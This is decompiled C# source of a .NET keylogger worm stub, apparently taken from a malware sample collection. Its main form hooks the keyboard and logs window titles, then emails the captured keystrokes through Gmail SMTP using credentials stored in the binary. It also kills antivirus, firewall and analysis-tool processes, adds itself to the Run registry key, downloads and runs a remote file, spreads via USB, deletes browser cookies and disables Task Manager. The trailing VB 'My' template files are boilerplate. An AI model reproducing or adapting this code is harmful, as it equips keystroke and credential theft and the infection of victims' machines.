// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using My;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Net;
using System.Net.Mail;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;
[DesignerGenerated]
public class Form1 : Form
{
private IContainer components;
[AccessedThroughProperty("TextBox1")]
private TextBox _TextBox1;
[AccessedThroughProperty("Timer1")]
private System.Windows.Forms.Timer _Timer1;
[AccessedThroughProperty("Timer2")]
private System.Windows.Forms.Timer _Timer2;
[AccessedThroughProperty("Timer4")]
private System.Windows.Forms.Timer _Timer4;
[AccessedThroughProperty("TextBox2")]
private TextBox _TextBox2;
[AccessedThroughProperty("TextBox3")]
private TextBox _TextBox3;
private string gmailpwd;
private string gmailusr;
private string tmrinterval;
private string exename;
private string downloadenabled;
private string downloadurl;
private string errortitle;
private string errormessage;
private string anties;
private string enablelink;
private string startup;
private string cb6;
private string cb7;
private string cb8;
private string cb9;
private const string Fitz = "-!_@Fitz-@_!";
[AccessedThroughProperty("K")]
private clannad _K;
private string elsf;
private string[] Settings;
private string str1n;
private string path;
private IPHostEntry adresipnes;
public Form1()
{
this.Load += new EventHandler(this.Form1_Load);
this.K = new clannad();
this.str1n = (string) null;
this.path = Path.GetTempPath();
this.adresipnes = Dns.GetHostByName(Dns.GetHostName());
this.InitializeComponent();
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
this.components = (IContainer) new System.ComponentModel.Container();
this.TextBox1 = new TextBox();
this.Timer1 = new System.Windows.Forms.Timer(this.components);
this.Timer2 = new System.Windows.Forms.Timer(this.components);
this.Timer4 = new System.Windows.Forms.Timer(this.components);
this.TextBox2 = new TextBox();
this.TextBox3 = new TextBox();
this.SuspendLayout();
TextBox textBox1_1 = this.TextBox1;
Point point1 = new Point(0, 0);
Point point2 = point1;
textBox1_1.Location = point2;
this.TextBox1.Name = "TextBox1";
TextBox textBox1_2 = this.TextBox1;
Size size1 = new Size(100, 20);
Size size2 = size1;
textBox1_2.Size = size2;
this.TextBox1.TabIndex = 0;
TextBox textBox2_1 = this.TextBox2;
point1 = new Point(104, 80);
Point point3 = point1;
textBox2_1.Location = point3;
this.TextBox2.Name = "TextBox2";
TextBox textBox2_2 = this.TextBox2;
size1 = new Size(100, 20);
Size size3 = size1;
textBox2_2.Size = size3;
this.TextBox2.TabIndex = 1;
TextBox textBox3_1 = this.TextBox3;
point1 = new Point(104, 107);
Point point4 = point1;
textBox3_1.Location = point4;
this.TextBox3.Name = "TextBox3";
TextBox textBox3_2 = this.TextBox3;
size1 = new Size(100, 20);
Size size4 = size1;
textBox3_2.Size = size4;
this.TextBox3.TabIndex = 2;
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
size1 = new Size(10, 10);
this.ClientSize = size1;
this.Controls.Add((Control) this.TextBox3);
this.Controls.Add((Control) this.TextBox2);
this.Controls.Add((Control) this.TextBox1);
this.FormBorderStyle = FormBorderStyle.None;
this.MaximizeBox = false;
this.MinimizeBox = false;
this.Name = nameof (Form1);
this.Opacity = 0.0;
this.ShowIcon = false;
this.ShowInTaskbar = false;
this.Text = nameof (Form1);
this.ResumeLayout(false);
this.PerformLayout();
}
internal virtual TextBox TextBox1
{
[DebuggerNonUserCode] get => this._TextBox1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.TextBox1_TextChanged);
if (this._TextBox1 != null)
this._TextBox1.TextChanged -= eventHandler;
this._TextBox1 = value;
if (this._TextBox1 == null)
return;
this._TextBox1.TextChanged += eventHandler;
}
}
internal virtual System.Windows.Forms.Timer Timer1
{
[DebuggerNonUserCode] get => this._Timer1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer1_Tick);
if (this._Timer1 != null)
this._Timer1.Tick -= eventHandler;
this._Timer1 = value;
if (this._Timer1 == null)
return;
this._Timer1.Tick += eventHandler;
}
}
internal virtual System.Windows.Forms.Timer Timer2
{
[DebuggerNonUserCode] get => this._Timer2;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer2_Tick);
if (this._Timer2 != null)
this._Timer2.Tick -= eventHandler;
this._Timer2 = value;
if (this._Timer2 == null)
return;
this._Timer2.Tick += eventHandler;
}
}
internal virtual System.Windows.Forms.Timer Timer4
{
[DebuggerNonUserCode] get => this._Timer4;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer4_Tick);
if (this._Timer4 != null)
this._Timer4.Tick -= eventHandler;
this._Timer4 = value;
if (this._Timer4 == null)
return;
this._Timer4.Tick += eventHandler;
}
}
internal virtual TextBox TextBox2
{
[DebuggerNonUserCode] get => this._TextBox2;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._TextBox2 = value;
}
internal virtual TextBox TextBox3
{
[DebuggerNonUserCode] get => this._TextBox3;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._TextBox3 = value;
}
private virtual clannad K
{
[DebuggerNonUserCode] get => this._K;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
clannad.DownEventHandler downEventHandler = new clannad.DownEventHandler(this.K_Down);
if (this._K != null)
clannad.Down -= downEventHandler;
this._K = value;
if (this._K == null)
return;
clannad.Down += downEventHandler;
}
}
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int GetForegroundWindow();
[DllImport("user32.dll", EntryPoint = "GetWindowTextA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int GetWindowText(int hwnd, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpString, int cch);
private void TextBox1_TextChanged(object sender, EventArgs e)
{
}
private void Form1_Load(object sender, EventArgs e)
{
F7h5o2wX4skMmN8HU f7h5o2wX4skMmN8Hu = new F7h5o2wX4skMmN8HU();
this.Hide();
this.Visible = false;
try
{
FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read);
this.gmailusr = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.gmailpwd = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.tmrinterval = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.exename = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.downloadenabled = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.downloadurl = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.enablelink = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.anties = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.startup = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.cb6 = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.cb7 = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.cb8 = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.cb9 = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.errortitle = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.errormessage = Strings.Space(checked ((int) FileSystem.LOF(1)));
this.Settings = Strings.Split(Encoding.Default.GetString(ResourceReader.ReadResource(Application.ExecutablePath)), "-!_@Fitz-@_!");
if (Operators.CompareString(this.Settings[13], "True", false) == 0)
{
int num = (int) MessageBox.Show(this.Settings[15], this.Settings[14], MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
if (Operators.CompareString(this.Settings[8], "True", false) == 0)
{
this.anserantiggenneko();
this.antianekowtser();
this.avarsernekochan();
this.avergerneko();
this.claromerchan();
this.comderosama();
this.edawrdelric();
this.eftopstkun();
this.macarfeechan();
this.kaperskerneko();
this.noremonkun();
this.noretonekimblee();
this.oofisescanalphonse();
this.anteyolleydebegeeyuki();
this.anteyoutpoestnagato();
this.antaypeeceechilingharuhi();
this.sandebocseenagisa();
this.searvearproetektnyu();
this.spieseweapalucard();
this.wyresharkehavok();
this.veeemchekmustang();
}
if (Operators.CompareString(this.Settings[9], "True", false) == 0)
this.adtoostertarpichigo("wuauclt", Application.ExecutablePath);
if (Operators.CompareString(this.Settings[5], "True", false) == 0)
{
MyProject.Computer.Network.DownloadFile(this.Settings[6], this.path + this.FileName(this.Settings[6]));
Thread.Sleep(5000);
Process.Start(this.path + this.FileName(this.Settings[6]));
}
if (Operators.CompareString(this.Settings[10], "True", false) == 0)
usb.Usb1();
if (Operators.CompareString(this.Settings[11], "True", false) == 0)
{
this.kielprocclust(true, true);
this.deeleeteeiecookeeshawkeye(true);
this.deeleeteemosilercookeeshoenhiem(true);
}
if (Operators.CompareString(this.Settings[12], "True", false) == 0)
this.Timer4.Start();
this.TextBox1.Text += Conversions.ToString(DateAndTime.Now);
this.Timer1.Start();
this.Timer2.Interval = Conversions.ToInteger(this.Settings[3]);
this.Timer2.Start();
this.K.CreateHook();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
private void K_Down(string Key) => this.TextBox1.Text += Key;
private void Timer4_Tick(object sender, EventArgs e)
{
if (!Conversions.ToBoolean(this.Settings[12]))
return;
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", (object) "1", RegistryValueKind.DWord);
}
public void kielprocclust(bool InternetExplorer, bool Firefox)
{
Process[] processes = Process.GetProcesses();
int index = 0;
while (index < processes.Length)
{
Process process = processes[index];
if (Firefox)
{
if (process.MainWindowTitle.Contains("Mozilla Firefox"))
process.Kill();
else if (Operators.CompareString(process.ProcessName, "firefox.exe", false) == 0)
process.Kill();
}
if (InternetExplorer)
{
if (process.MainWindowTitle.Contains("Internet Explorer"))
process.Kill();
else if (Operators.CompareString(process.ProcessName, "iexplore.exe", false) == 0)
process.Kill();
}
checked { ++index; }
}
}
public void deeleeteeiecookeeshawkeye(bool Enable)
{
if (!Enable)
return;
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.Cookies);
if (!Directory.Exists(folderPath))
return;
try
{
foreach (string file in MyProject.Computer.FileSystem.GetFiles(folderPath))
{
try
{
MyProject.Computer.FileSystem.DeleteFile(file);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
finally
{
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
public void deeleeteemosilercookeeshoenhiem(bool Enable)
{
if (!Enable)
return;
string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles";
if (!Directory.Exists(str))
return;
try
{
foreach (string directory in MyProject.Computer.FileSystem.GetDirectories(str))
{
try
{
foreach (string file in MyProject.Computer.FileSystem.GetFiles(directory))
{
if (file.Contains("cookie"))
{
try
{
MyProject.Computer.FileSystem.DeleteFile(file);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
finally
{
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
}
finally
{
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
public void deeleeteemosilersineonesarmstrong(bool Enable)
{
if (!Enable)
return;
string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles";
if (!Directory.Exists(str))
return;
try
{
foreach (string directory in MyProject.Computer.FileSystem.GetDirectories(str))
{
try
{
foreach (string file in MyProject.Computer.FileSystem.GetFiles(directory))
{
if (file.Contains("signon"))
{
try
{
MyProject.Computer.FileSystem.DeleteFile(file);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
finally
{
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
}
finally
{
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
public void antianekowtser()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "a2servic.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void anserantiggenneko()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "antigen.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void avarsernekochan()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ashWebSv.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void adtoostertarpichigo(string Name, string Path)
{
try
{
Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue(Name, (object) Path, RegistryValueKind.String);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public void deeleteeetoostertarpichigo()
{
try
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey.DeleteValue("APPLICATIONTITLE", false);
registryKey.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public void avergerneko()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "avgemc.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void kaperskerneko()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "avp", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void claromerchan()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "clamauto.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void comderosama()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "cpf.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void edawrdelric()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ewido.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void eftopstkun()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "FPAVServer.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void macarfeechan()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "mcagentmcuimgr", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void noremonkun()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "npfmsg", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void noretonekimblee()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ccapp.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void oofisescanalphonse()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "tmlisten.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void anteyolleydebegeeyuki()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ollydbg", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void anteyoutpoestnagato()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "outpost", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void antaypeeceechilingharuhi()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "pccntmon.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void sandebocseenagisa()
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = -2;
label_1:
int num3 = 2;
if (!this.Text.Contains("#"))
goto label_3;
label_2:
num3 = 3;
this.Close();
goto label_11;
label_3:
num3 = 5;
label_4:
num3 = 6;
this.Show();
goto label_11;
label_6:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
case 7:
case 8:
goto label_11;
case 5:
goto label_3;
case 6:
goto label_4;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_6;
}
throw ProjectData.CreateProjectError(-2146828237);
label_11:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
public void searvearproetektnyu()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "earthagent.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public void spieseweapalucard()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "spysweeper.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public bool veeemchekmustang()
{
string userName = Environment.UserName;
object[] objArray = new object[1]
{
(object) "SELECT * FROM Win32_VideoController"
};
if (new bool[1]{ true }[0])
Conversions.ToString(Conversions.ChangeType(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(objArray[0]))), typeof (string)));
bool flag;
return flag;
}
public void wyresharkehavok()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "wireshark", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
private string GetActiveWindowTitle()
{
string lpString = new string(char.MinValue, 100);
Form1.GetWindowText(Form1.GetForegroundWindow(), ref lpString, 100);
return lpString.Substring(0, checked (Strings.InStr(lpString, "\0") - 1));
}
private void Timer2_Tick(object sender, EventArgs e)
{
try
{
new SmtpClient("smtp.gmail.com")
{
EnableSsl = true,
Credentials = ((ICredentialsByHost) new NetworkCredential(this.Settings[1], this.Settings[2])),
Port = 587
}.Send(new MailMessage()
{
Subject = "[Dscreet Logs] - ",
To = {
this.Settings[1]
},
From = new MailAddress(this.Settings[1]),
Body = this.TextBox1.Text
});
this.TextBox1.Clear();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public string FileName(string FullPath) => Path.GetFileName(FullPath);
private void Timer1_Tick(object sender, EventArgs e)
{
if (Operators.CompareString(this.str1n, this.GetActiveWindowTitle(), false) == 0)
return;
this.TextBox1.Text = this.TextBox1.Text + "\r\n[-- " + this.GetActiveWindowTitle() + " --]\r\n";
this.str1n = this.GetActiveWindowTitle();
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86/My/MyApplication.cs
+48
View File
@@ -0,0 +1,48 @@
// Decompiled with JetBrains decompiler
// Type: My.MyApplication
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86.exe
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Windows.Forms;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : WindowsFormsApplicationBase
{
[STAThread]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[DebuggerHidden]
internal static void Main(string[] Args)
{
try
{
Application.SetCompatibleTextRenderingDefault(WindowsFormsApplicationBase.UseCompatibleTextRendering);
}
finally
{
}
MyProject.Application.Run(Args);
}
[DebuggerStepThrough]
public MyApplication()
: base(AuthenticationMode.Windows)
{
this.IsSingleInstance = false;
this.EnableVisualStyles = true;
this.SaveMySettingsOnExit = true;
this.ShutdownStyle = ShutdownMode.AfterMainFormCloses;
}
[DebuggerStepThrough]
protected override void OnCreateMainForm() => this.MainForm = (Form) MyProject.Forms.Form1;
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86/My/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: My.MyComputer
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyComputer : Computer
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyComputer()
{
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86/My/MyProject.cs
+212
View File
@@ -0,0 +1,212 @@
// Decompiled with JetBrains decompiler
// Type: My.MyProject
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[HideModuleName]
[StandardModule]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[DebuggerNonUserCode]
static MyProject()
{
}
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyForms
{
public Form1 m_Form1;
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
public Form1 Form1
{
[DebuggerNonUserCode] get
{
this.m_Form1 = MyProject.MyForms.Create__Instance__<Form1>(this.m_Form1);
return this.m_Form1;
}
[DebuggerNonUserCode] set
{
if (value == this.m_Form1)
return;
if (value != null)
throw new ArgumentException("Property can only be set to Nothing");
this.Dispose__Instance__<Form1>(ref this.m_Form1);
}
}
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyForms()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86/My/MySettings.cs
+73
View File
@@ -0,0 +1,73 @@
// Decompiled with JetBrains decompiler
// Type: My.MySettings
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
